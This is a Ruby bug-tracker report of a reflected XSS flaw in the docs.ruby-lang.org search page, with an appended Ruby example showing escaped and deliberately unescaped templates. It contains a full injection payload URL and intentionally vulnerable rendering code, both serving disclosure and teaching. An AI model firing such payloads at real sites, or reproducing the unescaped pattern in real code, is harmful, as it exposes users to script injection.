Issue #14389 has been updated by shevegen (Robert A. Heiler).


The twitter link above gives me "This account's Tweets are protected.", just
for your information.

----------------------------------------
Bug #14389: Reflected XSS 
https://bugs.ruby-lang.org/issues/14389#change-69761

* Author: TheGirdap (Hamit Cibo)
* Status: Open
* Priority: Normal
* Assignee: 
* Target version: 
* ruby -v: 
* Backport: 2.3: UNKNOWN, 2.4: UNKNOWN, 2.5: UNKNOWN
----------------------------------------
Hello,

Reflected XSS found.

https://docs.ruby-lang.org/ja/search/query:import/query:callback/%22%3E%3C/title%3Ealert(XSS%20A%C3%A7%C4%B1%C4%9F%C4%B1)%3C/script%3E%3E%3Cmarquee%3E%3Ch1%3EXSSa%C3%A7%C4%B1%C4%9F%C4%B1%3C/h1%3E%3C/marquee%3E%3D

Result:

ss:

search:

search box > ...import+words+payload => reflected XSS

https://twitter.com/hamit_cibo

---Files--------------------------------
Ekran_Resmi_2018-01-24_01.09.36 (1).png (187 KB)


-- 
https://bugs.ruby-lang.org/

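For readers of the thread: the following is an added Ruby example, not code from docs.ruby-lang.org, the rurema search tool or the reporter. It models the pattern the report describes (a search term reflected into the page without escaping) with a hypothetical two-line template, then shows the same template with every interpolation passed through CGI.escapeHTML. The only string taken from the report is the payload segment of the URL above, URL-decoded; the template markup, the TEMPLATE_TAGS list and the helper names are assumptions made for the example.

```ruby
require "cgi"
require "uri"

# Payload segment of the reported URL, URL-decoded. This is the reporter's
# string from the bug above; decoded it begins with `"></title>`.
REPORTED_QUERY = URI.decode_www_form_component(
  "%22%3E%3C/title%3Ealert(XSS%20A%C3%A7%C4%B1%C4%9F%C4%B1)%3C/script%3E%3E" \
  "%3Cmarquee%3E%3Ch1%3EXSSa%C3%A7%C4%B1%C4%9F%C4%B1%3C/h1%3E%3C/marquee%3E%3D"
)

# Hypothetical search-page template (an assumption for this example, not the
# site's real code) that reflects the query into the <title> element and into
# a quoted attribute value without any escaping.
def render_unescaped(query)
  "<!DOCTYPE html><html><head><title>Search: #{query}</title></head>" \
    "<body><input name=\"q\" value=\"#{query}\"></body></html>"
end

# Hardened version of the same template: CGI.escapeHTML rewrites & < > " '
# as entities, so the query can neither close the attribute value with `">`
# nor close the <title> element with a literal `</title>`.
def render_escaped(query)
  safe = CGI.escapeHTML(query)
  "<!DOCTYPE html><html><head><title>Search: #{safe}</title></head>" \
    "<body><input name=\"q\" value=\"#{safe}\"></body></html>"
end

# Element names the template itself emits (assumption matching the template
# above). Any other element name in the rendered page came from the query.
TEMPLATE_TAGS = %w[html head title body input].freeze

# Returns the element names present in `html` that the template does not emit,
# in order of first appearance. Empty means nothing was injected.
def injected_tag_names(html)
  html.scan(%r{</?([a-zA-Z][a-zA-Z0-9]*)}).flatten.uniq - TEMPLATE_TAGS
end

if __FILE__ == $PROGRAM_NAME
  puts "decoded query:  #{REPORTED_QUERY}"
  puts "unescaped page: injects #{injected_tag_names(render_unescaped(REPORTED_QUERY)).inspect}"
  puts "escaped page:   injects #{injected_tag_names(render_escaped(REPORTED_QUERY)).inspect}"
end
```

Two practical points. First, <title> content is RCDATA, so a browser only leaves it at a literal `</title>`; `"` and `>` alone do nothing there, but they do close the quoted attribute, and CGI.escapeHTML (or ERB::Util.html_escape, which plain ERB's `<%= %>` does not apply for you) neutralises both contexts at once. Second, that escaping is the right fix only for element content and quoted attributes; a query reflected inside a `<script>` block or into a URL needs JSON or URL encoding respectively.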